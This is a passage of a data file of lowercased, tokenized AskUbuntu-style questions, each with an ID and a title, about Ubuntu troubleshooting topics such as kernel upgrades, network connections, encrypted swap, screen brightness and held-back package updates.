unloadmodule : `` intel '' [ 9.147 ] ( ee ) screen ( s ) found , but none have a usable configuration . [ 9.147 ] fatal server error : [ 9.147 ] no screens found [ 9.147 ] ( ee ) please consult the the x.org foundation support at http : //wiki.x.org for help . [ 9.147 ] ( ee ) please also check the log file at `` /var/log/xorg.0.log '' for additional information . [ 9.147 ] ( ee ) [ 9.147 ] server terminated with error ( 1 ) . closing log file .
332559	kernel loading problem	recently i have installed ubuntu 12.04 on my computer . system is running smoothly , but i have a problem with touchpad recognition . i asked about it once before , but no-one gave me the answer . i tried to figure the problem by myself , and i found that installing a newer version of kernel may be the solution . at the moment i have 3.5.0-37 kernel . i tried various ways ( and versions ) during installation , but after rebooting and choosing linux version all i get is grub-like purple screen , with no options . recovery mode does not work as well . i tried to access ctrl+alt+f1 , but it gave no results too . as i said , i need new version of kernel , so advising me to use older linux versions is not welcome .
332565	apache install ca n't browse to localhost	first time setting up apache , using ubuntu server 12.04.02 i am using this guide : https : //www.digitalocean.com/community/articles/how-to-install-linux-apache-mysql-php-lamp-stack-on-ubuntu seems pretty straight forward , except i ca n't navigate to the webserver with my browser . i tried ie and chrome . chrome gives me the `` oops , this website ca n't be found '' message .
332567	ubuntu forums new log-in ?	i registered back in '07 . since that time i have changed email addresses . the current re-registration scheme for a pre-existing account involves sending a confirmation number to the originally registered email account that i have abandoned due to yahoo 's privacy policy . how do i communicate with the appropriate group so that i can log into the ubuntu forums ?
332572	internet connection problem in ubuntu	i am using ubuntu 13.04 and sometimes i 'm unable to connect to internet . after adding a dsl connection in my network connection preferences , dsl connection1 is n't visible anymore . when trying to connect using the pppoeconf command , the command is completeyed but when checking the connection using plog i get : aug 14 21:49:38 vijay pppd [ 887 ] : compression disabled by peer . aug 14 21:49:38 vijay pppd [ 887 ] : could not determine local ip address aug 14 21:49:38 vijay pppd [ 887 ] : connect time 0.1 minutes . aug 14 21:49:38 vijay pppd [ 887 ] : sent 118 bytes , received 138 bytes . aug 14 21:49:38 vijay pppd [ 887 ] : connection terminated after trying 5 to 6 time able to connect to internet . does anyone know what 's going on ?
332573	i want to be able to stack my applications / links in cairo dock but the applications lose their icon when added to stack	i have ubuntu 13.04 and cairo dock on it . i am trying to be able to make a stack of my applications but some of them do n't appear on my hud or unity launcher there for i made shortcuts / links to open these . my shortcuts and links where customized under preferences to show the icon related to the application but when added to cairo dock it looses that icon . i have also experienced the same thing with .sh extensions . is there anyway to correct this ?
332574	can ubuntu run from usb drive ?	i currently am a windows 7 user , but i 'm interested in trying out ubuntu . how can i download it on usb without installing it on my computer 's hard drive ?
332575	backlight adjustment not working in lenovo ideapad y580	i installed ubuntu 13.04 on my y580 , and i added the acpi_backlight=vendor option to the bootloader . the os boots without the black screen now , but i ca n't adjust the brightness with fn+up/down keys . is there any solution for this ?
332576	how to download and use any other kernel than the one which is installed by default	supposing i am using ubuntu 12.04 ( lts ) , and it uses the 3.5.0-37 kernel . if i wanted to use the 3.9.6 kernel , how could i use it ? i dont want to upgrade to 13.04 would i have to manually download this kernel , compile it and make its initrd , or could i fetch it using apt-get install by enabling some repository ? please help .
332595	how to reliably determine all folders not used in last 7 days ?	i 'm writing a script for cleanup job . the script needs to cleanup all folders which are not accessed for more than 7 days . currently i 'm using - for sub_folder in * ; do if [ -z $ ( find $ sub_folder -type f -atime +7| head -n 1 ) ] ; then rm -rf $ sub_folder fi done is there any better way which can reliably determine folders not used for last n days ?
332603	what is the process for reporting an app with a stolen icon ?	today i found an application in the ubuntu software center called easyadmin . this application uses the ios settings icon . how do i report this ?
332606	custom .desktop entry to launch minecraft not working	i have made a minecraft.desktop file in ~/.local/share/applications/ that reads as follows : [ desktop entry ] name=minecraft comment=play this game in openjdk java 7 runtime exec=minecraft terminal=false icon=minecraft type=application categories=game ; and my `` minecraft '' script reads : java -jar ~/desktop/minecraft.jar i can enter java -jar ~/desktop/minecraft.jar into the teminal and minecraft will start . i can also enter minecraft into the terminal and the script will run and the game will start . however , the icon will not actually appear to do anything when i click it with this configuration . i tried first with the exec line as exec=java -jar ~/desktop/minecraft.jar , but that did n't work , so i tried the script . i just do n't know why nothing seems to happen when i use the launcher icon ? ? any thought on this issue ? thanks !
332610	ubuntu edge : where to buy ?	i have been seeing in the news and in several reviews of the ubuntu edge `` superphone '' and i was just wondering how or where to buy the phone , i heard about indiegogo , but is that the only place in which i might be able to buy it , if not is the physical phone being bought from indiegogo ?
332621	unable to access internet with ubuntu 12.04 : i 'm typing this on the net with wifi using the same computer on windows	downloaded ubuntu 12.04 and believe everything is ok . tried many things yet am unable to connect to the internet by wifi or wired connections . the computer ( dell latitude d600 ) is fine because i 'm using it to post this question using the wifi and firefox with windows . i am also unable to connect to the web using ethernet . definitely ubuntu and not the computer or web interface ! not able to view any wireless networks . some questions make no sense . my fios router provides a wep key , wps pin and a wan mac : number . ubuntu asks for more than that and i become lost because those are the only # s i have for input ! seeing that the computer and net interface is 100 % solid and the ubuntu download also appears to be 100 % , there must be a simple code that will activate either wifi , ethernet or both ! thank you ! i entered sudo lshw -c network and got the numbers for the router . do n't have the slightest idea what info is required or where to enter it . thanks ! description : network controller product : bcm4306 802.11a/b/g vendor : broadcom corporation physical id : 3 bus info : pci @ 0000:02:03.0 version : 03 width : 32 bits clock : 33mhz capabilities : bus_master configuration : driver=b43-pci-bridge latency=32 resources : irq:5 memory : faffe000-faffffff thanks !
332622	firefox home page change without edit preference option	my version of firefox does not give me a preferences option under the edit tab . it just is not there . how can i change my internet home page without this option ?
332624	all my windows i open in ubuntu 13.04 are invisible	whenever i boot ubuntu 13.04 from the grub screen everything is normal and , when i get to the login screen everything is still normal . then , as usual ( i am new ) , i open the terminal to try and learn more about how to use it . however , all the screen shows , is my desktop . i check to see if i opened terminal so i open another window but still nothing . everything is like this , except the unity launcher , ( unity it self is fine ) and the administrator screen , where you put in your password like sudo . any help would be appreciated .
332625	swap partition not recognized ( the disk drive with uuid= ... is not ready yet or not present )	i think i had an encrypted swap partition , because i chose to encrypt my home directory during the installation . i believe that 's what the line with /dev/mapper/cryptswap1 ... in my /etc/fstab is all about . i did something to bork my swap because on the next boot , i got a message ( paraphrased ) : the disk drive for /dev/mapper/cryptswap1 is not ready yet or not present . wait to continue . press s to skip or m to manually recover . ( as a side note , pressing s or m seemed to do nothing different from just waiting . ) here 's what i 've tried : this tutorial on how to fix the swap partition not mounting . however , in the above , the mkswap command fails because the device is busy . so i booted from a live usb , ran gparted to reformat the swap partition ( which showed up as an unknown fs type ) , and chrooted into the broken system to try that tutorial again . i also adjusted /etc/initramfs-tools/conf.d/resume and /etc/fstab to reflect the new uuid generated from formatting the partition as a swap . that still did n't work ; instead of /dev/mapper/cryptswap1 not present , `` the disk drive with uuid= [ swap partition 's uuid ] is not ready yet or not present ... '' so i decided to start afresh as though i never had created a swap partition in the first place . from the live usb , i deleted the swap partition altogether ( which , again showed up in gparted as an unknown fs type ) , removed the swap and cryptswap entries in /etc/fstab as well as removed /etc/initramfs-tools/conf.d/resume and /etc/crypttab . at this point the main system should n't be considered broken because there is no swap partition and no instructions to mount one , right ? i did n't get any errors during startup . i followed the same instructions to create and encrypt the swap partition , starting with creating a partition for the swap , though i think fdisk said a reboot was necessary to see changes . i was confident the 3rd process above would work , but the problem yet persists . some relevant info ( /dev/sda8 is the swap partition ) : /etc/fstab file : # /etc/fstab : static file system information . # # use 'blkid ' to print the universally unique identifier for a # device ; this may be used with uuid= as a more robust way to name devices # that works even if disks are added and removed . see fstab ( 5 ) . # # < file system > < mount point > < type > < options > < dump > < pass > proc /proc proc nodev , noexec , nosuid 0 0 # / was on /dev/sda6 during installation uuid=4c11e82c-5fe9-49d5-92d9-cdaa6865c991 / ext4 errors=remount-ro 0 1 # /boot was on /dev/sda5 during installation uuid=4031413e-e89f-49a9-b54c-e887286bb15e /boot ext4 defaults 0 2 # /home was on /dev/sda7 during installation uuid=d5bbfc6f-482a-464e-9f26-fd213230ae84 /home ext4 defaults 0 2 # swap was on /dev/sda8 during installation uuid=5da2c720-8787-4332-9317-7d96cf1e9b80 none swap sw 0 0 /dev/mapper/cryptswap1 none swap sw 0 0 output of sudo mount : /dev/sda6 on / type ext4 ( rw , errors=remount-ro ) proc on /proc type proc ( rw , noexec , nosuid , nodev ) sysfs on /sys type sysfs ( rw , noexec , nosuid , nodev ) none on /sys/fs/fuse/connections type fusectl ( rw ) none on /sys/kernel/debug type debugfs ( rw ) none on /sys/kernel/security type securityfs ( rw ) udev on /dev type devtmpfs ( rw , mode=0755 ) devpts on /dev/pts type devpts ( rw , noexec , nosuid , gid=5 , mode=0620 ) tmpfs on /run type tmpfs ( rw , noexec , nosuid , size=10 % , mode=0755 ) none on /run/lock type tmpfs ( rw , noexec , nosuid , nodev , size=5242880 ) none on /run/shm type tmpfs ( rw , nosuid , nodev ) /dev/sda5 on /boot type ext4 ( rw ) /dev/sda7 on /home type ext4 ( rw ) /home/undisclosed/.private on /home/undisclosed type ecryptfs ( ecryptfs_check_dev_ruid , ecryptfs_cipher=aes , ecryptfs_key_bytes=16 , ecryptfs_unlink_sigs , ecryptfs_sig=cbae1771abd34009 , ecryptfs_fnek_sig=7cefe2f59aab8e58 ) gvfs-fuse-daemon on /home/undisclosed/.gvfs type fuse.gvfs-fuse-daemon ( rw , nosuid , nodev , user=undisclosed ) output of sudo blkid ( note that /dev/sda8 is missing ) : /dev/sda1 : label= '' system '' uuid= '' 960490e80490cc9d '' type= '' ntfs '' /dev/sda2 : uuid= '' d4043140043126c0 '' type= '' ntfs '' /dev/sda3 : label= '' shared '' uuid= '' 80f613e1f613d5ee '' type= '' ntfs '' /dev/sda5 : uuid= '' 4031413e-e89f-49a9-b54c-e887286bb15e '' type= '' ext4 '' /dev/sda6 : uuid= '' 4c11e82c-5fe9-49d5-92d9-cdaa6865c991 '' type= '' ext4 '' /dev/sda7 : uuid= '' d5bbfc6f-482a-464e-9f26-fd213230ae84 '' type= '' ext4 '' /dev/mapper/cryptswap1 : uuid= '' 41fa147a-3e2c-4e61-b29b-3f240fffbba0 '' type= '' swap '' output of sudo fdisk -l : disk /dev/mapper/cryptswap1 does n't contain a valid partition table disk /dev/sda : 320.1 gb , 320072933376 bytes 255 heads , 63 sectors/track , 38913 cylinders , total 625142448 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes disk identifier : 0xdec3fed2 device boot start end blocks id system /dev/sda1 * 2048 409599 203776 7 hpfs/ntfs/exfat /dev/sda2 409600 210135039 104862720 7 hpfs/ntfs/exfat /dev/sda3 210135040 415422463 102643712 7 hpfs/ntfs/exfat /dev/sda4 415424510 625141759 104858625 5 extended /dev/sda5 415424512 415922175 248832 83 linux /dev/sda6 415924224 515921919 49998848 83 linux /dev/sda7 515923968 621389823 52732928 83 linux /dev/sda8 621391872 625141759 1874944 82 linux swap / solaris disk /dev/mapper/cryptswap1 : 1919 mb , 1919942656 bytes 255 heads , 63 sectors/track , 233 cylinders , total 3749888 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes disk identifier : 0xaf5321b5 /etc/initramfs-tools/conf.d/resume file : resume=uuid=5da2c720-8787-4332-9317-7d96cf1e9b80 /etc/crypttab file : cryptswap1 /dev/sda8 /dev/urandom swap , cipher=aes-cbc-essiv : sha256 output of sudo swapon -as : filename type size used priority /dev/mapper/cryptswap1 partition 1874940 0 -1 output of sudo free -m : total used free shared buffers cached mem : 1476 1296 179 0 35 671 -/+ buffers/cache : 590 886 swap : 1830 0 1830 so , how can this be fixed ?
332626	ca n't hear sound from headphone jack	i recently installed ubuntu 12.04 lts 32-bit desktop . i ca n't hear sound from headphone jack in my pc while speakers are working perfectly . i am very new to linux and i dont have any idea about the audio drivers in linux . please help me to solve the issue .
332633	windows 7 wo n't hibernate , after installing ubuntu 12.04 , dual boot	i have had this little problem , since i installed ubuntu 12.04 recently , dual booting alongside windows 7 . sleep and waking up ( with the data maintained on ram ) is working fine on windows 7 , since i 'm not involved with grub ( windows resumes its state instantly ) in the process of awaking . however , by default , my computer hibernates after 1 hour or so of sleeping . when i open my computer again , and choose through grub to boot windows 7 , the system does not resume where i left it , but behaves as if it did not shut down properly and offers me with options to boot normally , or enter recovery/safe mode . i choose normal start , and the system loads from the beginning.this happened , as i said , after i installed ubuntu . i had linux mint before , with no problems on this , although i had not configured it myself . you should know that i had made some mistake at the installation . after i got the message the installation was over , i was kept waiting too long on the installation screen , so i manually rebooted the computer , thinking it had frozen . after that , i got a grub error , being unable to boot any system , and fixed it by running a grub fixing program on ubuntu live cd . this may have had an impact . to sum up , i suspect that the problem is grub is not '' communicating '' correctly with windows about the hibernation , and since i do n't know what exactly to do , i 'm asking for your help . thank you in advance .
332640	eth0 not working/has no inet address ?	i 'm fairly new to linux and networking and i 've been playing with tcpdump but when ever i try to run tcpdump it tells me eth0 has no ipv4 address which is true it has no inet whatsoever . this is the ifconfig -a : eth0 link encap : ethernet hwaddr 08:9e:01:21:5b:2a up broadcast multicast mtu:1500 metric:1 rx packets:0 errors:0 dropped:0 overruns:0 frame:0 tx packets:0 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 rx bytes:0 ( 0.0 b ) tx bytes:0 ( 0.0 b ) interrupt:44 lo link encap : local loopback inet addr:127.0.0.1 mask:255.0.0.0 inet6 addr : : :1/128 scope : host up loopback running mtu:16436 metric:1 rx packets:279 errors:0 dropped:0 overruns:0 frame:0 tx packets:279 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:0 rx bytes:9469 ( 9.2 kib ) tx bytes:9469 ( 9.2 kib ) wlan0 link encap : ethernet hwaddr 08:3e:8e:65:20:35 inet addr:10.1.3.37 bcast:10.1.255.255 mask:255.255.0.0 inet6 addr : fe80 : :a3e:8eff : fe65:2035/64 scope : link up broadcast running multicast mtu:1500 metric:1 rx packets:9703 errors:0 dropped:0 overruns:0 frame:0 tx packets:10686 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 rx bytes:5233812 ( 4.9 mib ) tx bytes:1857593 ( 1.7 mib ) i 'm trying to see all the traffic on the lan which is not possible if eth0 doesnt work . is there anyway i can get eth0 working ?
332657	can not change brightness setting using function buttons or using the brightness control bar on hp laptop	i faced this problem when i brought a new hp laptop , hoping to install ubuntu ( linux ) but when i booted from a live dvd the brightness was set at max and wouldnt be changed from the function keys or from the brightness settings bar , and it was the same after installation . specs- hp probook 4440s intel core i5 3210m intel hd 4000 graphics 6gb ram motherboard-hp
332658	remove ubuntu 13.04 from triple booted computer	i have a triple-booted desktop computer with ubuntu 12.04 lts , windows 7 and ubuntu 13.04 . i plan to permanently keep ubuntu 12.04 and windows 7 but i want to switch ubuntu 13.04 to another operating system as unity on 13.04 seems to slow my computer down and usually freezes it . since i ca n't post images in these questions , here is the image of gparted with my set up right now : i want to remove ubuntu 13.04 from my triple boot but am not sure if removing it right now will mess up 12.04 . i know windows 7 is sda1 to sda 3 , ubuntu 12.04 is sda 5 and ubuntu 13.04 is sda 7 . should i just delete it ? are there any problems i should worry about ?
332659	flash drive file system is n't recognized	i recently got this credit/business-card shaped usb flash drive . in windows 7 it 's recognized fine , after some drivers are automatically installed ( without user interaction ) once it 's plugged-in . in ubuntu 13.04 all i can see in gparted is that the file system on the device is `` unknown '' and it also wo n't appear in nautilus ' device list ( on the left panel ) . when i ran this command : sudo file -ls /dev/sdb that 's what i got : /dev/sdb : x86 boot sector ; partition 1 : id=0xc , starthead 0 , startsector 32 , 7826656 sectors , extended partition table ( last ) \011 , code offset 0x0 edit - also , when running this : sudo fdisk -l /dev/sdb that 's what i got : disk /dev/sdb : 4007 mb , 4007264256 bytes 230 heads , 63 sectors/track , 540 cylinders , total 7826688 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes disk identifier : 0x00000000 device boot start end blocks id system /dev/sdb1 32 7826687 3913328 c w95 fat32 ( lba ) any ideas ? ( i 'd rather not format it with ubuntu because i 'm afraid it might make the situation worse )
332667	when already connected with eth0 , network manager still tries to connect wifi	i have a solid working network and internet connection through eth0 , but network manager still automatically tries to connect to wifi . since the wifi is unreliable , this is just trying and failing over and over again , but even with decent wifi , i do n't want both connections . how do i configure it to not attempt to connect wlan0 if eth0 is connected ? # networkmanager.conf : [ main ] plugins=ifupdown , keyfile dns=dnsmasq [ ifupdown ] managed=false
332668	what does the libkwinnvidiahack4 package do ?	i 've just stumbled upon the packages libkwinnvidiahack4 ( and also libkwinactivenvidiahack4 ) . from the description i understand it provides some `` hacks '' for the kde window manager in combination with an nvidia binary graphics driver . this package contains a library used by nvidia cards for the kde window manager . this package is part of the kde workspace module . however , this description lacks what it actually does . i use kde/kubuntu and i have the nvidia graphics driver installed . what are the benefits of installing these packages ? what do they do ? i 've got the libkwinnvidiahack4 package installed ( probably automatically ) , but i 'm not sure what it is responsible for . running through the changelogs ( apt-get changelog libkwinnvidiahack4 ) give me the kde-workspace changelog with an entry ( several snippets taken from it ) : move libkwinnvidiahack4 to its own package add the packages kde-window-manager-active kde-window-manager-active-gles libkwinactiveglutils1 libkwinactiveglesutils1 libkwinactiveeffects1abi3 libkwinactivenvidiahack4 kde-window-manager/-gles depends on libkwinnvidiahack4 do n't install /usr/lib/libkwinnvidiahack.so . no one is supposed to link against libkwinnvidiahack . make kdebase-workspace-dev depend on libkdecorations4 and libkwineffects1 instead of kde-window-manager now that kde-window-manager contains nothing one can link against . which also does not explain why these packages are added and what they do .
332669	unable to edit /etc/apt/sources.list file	when i try to edit sources.list file using the command : $ : gksu gedit /etc/apt/sources.list it request for administrative password and when i type the password , it says incorrect and try again.what to do ? i am new to linux or ubuntu .
332677	launchpad ca n't find rsvg while building deb package for precise pangolin	i have ppa with one package : clarity-icon-theme . it builds fine on all versions of ubuntu , except precise pangolin where it fails with the following error : rsvg : command not found i have dependency in control file : build-depends : debhelper ( > = 7 ) , librsvg2-bin
332680	ubuntu 12.04 : not all updates can be installed	i have ubuntu 12.04 installed on my machine.when i run the update manager on my machine i get the following message . i do n't know how to fix this issue.is it safe to run apt-get dist upgrade. ? i am quite happy with ubuntu 12.04 lts and not keen on moving to a newer release.please advice . output of sudo apt-get update on command line is given below . hit http : //mirror.aarnet.edu.au precise release.gpg hit http : //mirror.aarnet.edu.au precise-updates release.gpg hit http : //mirror.aarnet.edu.au precise-backports release.gpg hit http : //mirror.aarnet.edu.au precise-security release.gpg hit http : //mirror.aarnet.edu.au precise release hit http : //mirror.aarnet.edu.au precise-updates release hit http : //mirror.aarnet.edu.au precise-backports release hit http : //mirror.aarnet.edu.au precise-security release hit http : //mirror.aarnet.edu.au precise/main sources hit http : //mirror.aarnet.edu.au precise/restricted sources hit http : //mirror.aarnet.edu.au precise/universe sources hit http : //mirror.aarnet.edu.au precise/multiverse sources hit http : //mirror.aarnet.edu.au precise/main amd64 packages hit http : //mirror.aarnet.edu.au precise/restricted amd64 packages hit http : //mirror.aarnet.edu.au precise/universe amd64 packages hit http : //mirror.aarnet.edu.au precise/multiverse amd64 packages hit http : //mirror.aarnet.edu.au precise/main i386 packages hit http : //mirror.aarnet.edu.au precise/restricted i386 packages hit http : //www.scootersoftware.com stable release.gpg hit http : //mirror.aarnet.edu.au precise/universe i386 packages hit http : //mirror.aarnet.edu.au precise/multiverse i386 packages hit http : //mirror.aarnet.edu.au precise/main translationindex hit http : //mirror.aarnet.edu.au precise/multiverse translationindex hit http : //mirror.aarnet.edu.au precise/restricted translationindex hit http : //mirror.aarnet.edu.au precise/universe translationindex hit http : //mirror.aarnet.edu.au precise-updates/main sources hit http : //mirror.aarnet.edu.au precise-updates/restricted sources hit http : //mirror.aarnet.edu.au precise-updates/universe sources hit http : //download.virtualbox.org precise release.gpg hit http : //mirror.aarnet.edu.au precise-updates/multiverse sources hit http : //mirror.aarnet.edu.au precise-updates/main amd64 packages hit http : //mirror.aarnet.edu.au precise-updates/restricted amd64 packages hit http : //mirror.aarnet.edu.au precise-updates/universe amd64 packages hit http : //mirror.aarnet.edu.au precise-updates/multiverse amd64 packages hit http : //mirror.aarnet.edu.au precise-updates/main i386 packages hit http : //mirror.aarnet.edu.au precise-updates/restricted i386 packages hit http : //mirror.aarnet.edu.au precise-updates/universe i386 packages hit http : //mirror.aarnet.edu.au precise-updates/multiverse i386 packages hit http : //mirror.aarnet.edu.au precise-updates/main translationindex hit http : //mirror.aarnet.edu.au precise-updates/multiverse translationindex hit http : //mirror.aarnet.edu.au precise-updates/restricted translationindex hit http : //mirror.aarnet.edu.au precise-updates/universe translationindex hit http : //mirror.aarnet.edu.au precise-backports/main sources hit http : //mirror.aarnet.edu.au precise-backports/restricted sources hit http : //mirror.aarnet.edu.au precise-backports/universe sources hit http : //extras.ubuntu.com precise release.gpg hit http : //archive.canonical.com precise release.gpg hit http : //ppa.launchpad.net precise release.gpg hit http : //ppa.launchpad.net precise release.gpg hit http : //mirror.aarnet.edu.au precise-backports/multiverse sources hit http : //mirror.aarnet.edu.au precise-backports/main amd64 packages hit http : //mirror.aarnet.edu.au precise-backports/restricted amd64 packages hit http : //mirror.aarnet.edu.au precise-backports/universe amd64 packages hit http : //mirror.aarnet.edu.au precise-backports/multiverse amd64 packages hit http : //mirror.aarnet.edu.au precise-backports/main i386 packages hit http : //mirror.aarnet.edu.au precise-backports/restricted i386 packages hit http : //mirror.aarnet.edu.au precise-backports/universe i386 packages hit http : //mirror.aarnet.edu.au precise-backports/multiverse i386 packages hit http : //mirror.aarnet.edu.au precise-backports/main translationindex hit http : //mirror.aarnet.edu.au precise-backports/multiverse translationindex hit http : //download.virtualbox.org precise release hit http : //mirror.aarnet.edu.au precise-backports/restricted translationindex hit http : //mirror.aarnet.edu.au precise-backports/universe translationindex hit http : //mirror.aarnet.edu.au precise-security/main sources hit http : //mirror.aarnet.edu.au precise-security/restricted sources hit http : //mirror.aarnet.edu.au precise-security/universe sources hit http : //mirror.aarnet.edu.au precise-security/multiverse sources hit http : //mirror.aarnet.edu.au precise-security/main amd64 packages hit http : //mirror.aarnet.edu.au precise-security/restricted amd64 packages hit http : //mirror.aarnet.edu.au precise-security/universe amd64 packages hit http : //mirror.aarnet.edu.au precise-security/multiverse amd64 packages hit http : //mirror.aarnet.edu.au precise-security/main i386 packages hit http : //mirror.aarnet.edu.au precise-security/restricted i386 packages hit http : //mirror.aarnet.edu.au precise-security/universe i386 packages hit http : //mirror.aarnet.edu.au precise-security/multiverse i386 packages hit http : //mirror.aarnet.edu.au precise-security/main translationindex hit http : //mirror.aarnet.edu.au precise-security/multiverse translationindex hit http : //mirror.aarnet.edu.au precise-security/restricted translationindex hit http : //mirror.aarnet.edu.au precise-security/universe translationindex hit http : //mirror.aarnet.edu.au precise/main translation-en hit http : //mirror.aarnet.edu.au precise/multiverse translation-en hit http : //www.scootersoftware.com stable release hit http : //mirror.aarnet.edu.au precise/restricted translation-en hit http : //mirror.aarnet.edu.au precise/universe translation-en hit http : //dl.google.com stable release.gpg hit http : //extras.ubuntu.com precise release hit http : //archive.canonical.com precise release hit http : //mirror.aarnet.edu.au precise-updates/main translation-en hit http : //mirror.aarnet.edu.au precise-updates/multiverse translation-en hit http : //mirror.aarnet.edu.au precise-updates/restricted translation-en hit http : //mirror.aarnet.edu.au precise-updates/universe translation-en hit http : //mirror.aarnet.edu.au precise-backports/main translation-en hit http : //ppa.launchpad.net precise release hit http : //mirror.aarnet.edu.au precise-backports/multiverse translation-en hit http : //mirror.aarnet.edu.au precise-backports/restricted translation-en hit http : //mirror.aarnet.edu.au precise-backports/universe translation-en hit http : //mirror.aarnet.edu.au precise-security/main translation-en hit http : //download.virtualbox.org precise/contrib amd64 packages hit http : //mirror.aarnet.edu.au precise-security/multiverse translation-en hit http : //mirror.aarnet.edu.au precise-security/restricted translation-en hit http : //mirror.aarnet.edu.au precise-security/universe translation-en hit http : //dl.google.com stable release hit http : //download.virtualbox.org precise/contrib i386 packages hit http : //extras.ubuntu.com precise/main sources hit http : //archive.canonical.com precise/partner sources hit http : //ppa.launchpad.net precise release hit http : //www.scootersoftware.com stable/non-free amd64 packages hit http : //dl.google.com stable/main amd64 packages ign http : //download.virtualbox.org precise/contrib translationindex hit http : //dl.google.com stable/main i386 packages hit http : //extras.ubuntu.com precise/main amd64 packages hit http : //extras.ubuntu.com precise/main i386 packages ign http : //extras.ubuntu.com precise/main translationindex hit http : //archive.canonical.com precise/partner amd64 packages hit http : //archive.canonical.com precise/partner i386 packages ign http : //archive.canonical.com precise/partner translationindex hit http : //ppa.launchpad.net precise/main sources hit http : //ppa.launchpad.net precise/main amd64 packages hit http : //ppa.launchpad.net precise/main i386 packages ign http : //ppa.launchpad.net precise/main translationindex ign http : //dl.google.com stable/main translationindex hit http : //www.scootersoftware.com stable/non-free i386 packages hit http : //ppa.launchpad.net precise/main sources hit http : //ppa.launchpad.net precise/main amd64 packages hit http : //ppa.launchpad.net precise/main i386 packages ign http : //ppa.launchpad.net precise/main translationindex ign http : //www.scootersoftware.com stable/non-free translationindex ign http : //download.virtualbox.org precise/contrib translation-en_nz ign http : //dl.google.com stable/main translation-en_nz ign http : //download.virtualbox.org precise/contrib translation-en ign http : //dl.google.com stable/main translation-en ign http : //extras.ubuntu.com precise/main translation-en_nz ign http : //archive.canonical.com precise/partner translation-en_nz ign http : //extras.ubuntu.com precise/main translation-en ign http : //archive.canonical.com precise/partner translation-en ign http : //ppa.launchpad.net precise/main translation-en_nz ign http : //ppa.launchpad.net precise/main translation-en ign http : //ppa.launchpad.net precise/main translation-en_nz ign http : //ppa.launchpad.net precise/main translation-en ign http : //www.scootersoftware.com stable/non-free translation-en_nz ign http : //www.scootersoftware.com stable/non-free translation-en reading package lists ... output of sudo apt-get upgrade reading package lists ... done building dependency tree reading state information ... done the following packages have been kept back : libexttextcat-data libreoffice-base-core libreoffice-calc libreoffice-common libreoffice-core libreoffice-draw libreoffice-emailmerge libreoffice-gnome libreoffice-gtk libreoffice-help-en-us libreoffice-impress libreoffice-math libreoffice-style-tango libreoffice-writer linux-generic linux-headers-generic linux-image-generic mysql-client-5.5 mysql-server-5.5 mysql-server-core-5.5 python-uno uno-libs3 ure 0 upgraded , 0 newly installed , 0 to remove and 23 not upgraded . output of cat /var/log/apt/history.log start-date : 2013-08-13 17:25:02 commandline : apt-get install colordiff install : colordiff : amd64 ( 1.0.9-1 ) end-date : 2013-08-13 17:25:09 start-date : 2013-08-14 08:18:29 commandline : aptdaemon role='role-commit-packages ' sender=':1.66' upgrade : apt-transport-https : amd64 ( 0.8.16~exp12ubuntu10.10 , 0.8.16~exp12ubuntu10.12 ) , unity : amd64 ( 5.18.0-0ubuntu2 , 5.20.0-0ubuntu2 ) , gir1.2-dbusmenu-gtk-0.4 : amd64 ( 0.6.2-0ubuntu0.1 , 0.6.2-0ubuntu0.2 ) , libebackend-1.2-1 : amd64 ( 3.2.3-0ubuntu7 , 3.2.3-0ubuntu7.1 ) , bind9-host : amd64 ( 9.8.1.dfsg.p1-4ubuntu0.6 , 9.8.1.dfsg.p1-4ubuntu0.7 ) , gwibber-service-identica : amd64 ( 3.4.2-0ubuntu2.2 , 3.4.2-0ubuntu2.3 ) , libgudev-1.0-0 : amd64 ( 175-0ubuntu9.3 , 175-0ubuntu9.4 ) , libgudev-1.0-0 : i386 ( 175-0ubuntu9.3 , 175-0ubuntu9.4 ) , thunderbird-locale-en-us : amd64 ( 17.0.7+build1-0ubuntu0.12.04.1 , 17.0.8+build1-0ubuntu0.12.04.1 ) , libxml2-utils : amd64 ( 2.7.8.dfsg-5.1ubuntu4.4 , 2.7.8.dfsg-5.1ubuntu4.6 ) , dnsutils : amd64 ( 9.8.1.dfsg.p1-4ubuntu0.6 , 9.8.1.dfsg.p1-4ubuntu0.7 ) , mysql-server : amd64 ( 5.5.31-0ubuntu0.12.04.2 , 5.5.32-0ubuntu0.12.04.1 ) , fonts-opensymbol : amd64 ( 102.2+libo4.0.4~rc2-0ubuntu1~precise1 , 102.3+libo4.1.0-0ubuntu1~precise1~ppa1 ) , libevince3-3 : amd64 ( 3.4.0-0ubuntu1.6 , 3.4.0-0ubuntu1.7 ) , thunderbird : amd64 ( 17.0.7+build1-0ubuntu0.12.04.1 , 17.0.8+build1-0ubuntu0.12.04.1 ) , gir1.2-dbusmenu-glib-0.4 : amd64 ( 0.6.2-0ubuntu0.1 , 0.6.2-0ubuntu0.2 ) , liblcms2-2 : amd64 ( 2.4-0ubuntu1~precise1 , 2.5-0ubuntu1~precise1 ) , unity-common : amd64 ( 5.18.0-0ubuntu2 , 5.20.0-0ubuntu2 ) , lightdm : amd64 ( 1.2.3-0ubuntu2.2 , 1.2.3-0ubuntu2.3 ) , firefox-globalmenu : amd64 ( 22.0+build2-0ubuntu0.12.04.2 , 23.0+build2-0ubuntu0.12.04.1 ) , libdns81 : amd64 ( 9.8.1.dfsg.p1-4ubuntu0.6 , 9.8.1.dfsg.p1-4ubuntu0.7 ) , gwibber-service-twitter : amd64 ( 3.4.2-0ubuntu2.2 , 3.4.2-0ubuntu2.3 ) , gwibber-service-facebook : amd64 ( 3.4.2-0ubuntu2.2 , 3.4.2-0ubuntu2.3 ) , libwps-0.2-2 : amd64 ( 0.2.7-1~precise1 , 0.2.9-1ubuntu1~precise1 ) , libapt-inst1.4 : amd64 ( 0.8.16~exp12ubuntu10.10 , 0.8.16~exp12ubuntu10.12 ) , apport : amd64 ( 2.0.1-0ubuntu17.3 , 2.0.1-0ubuntu17.4 ) , libedata-book-1.2-11 : amd64 ( 3.2.3-0ubuntu7 , 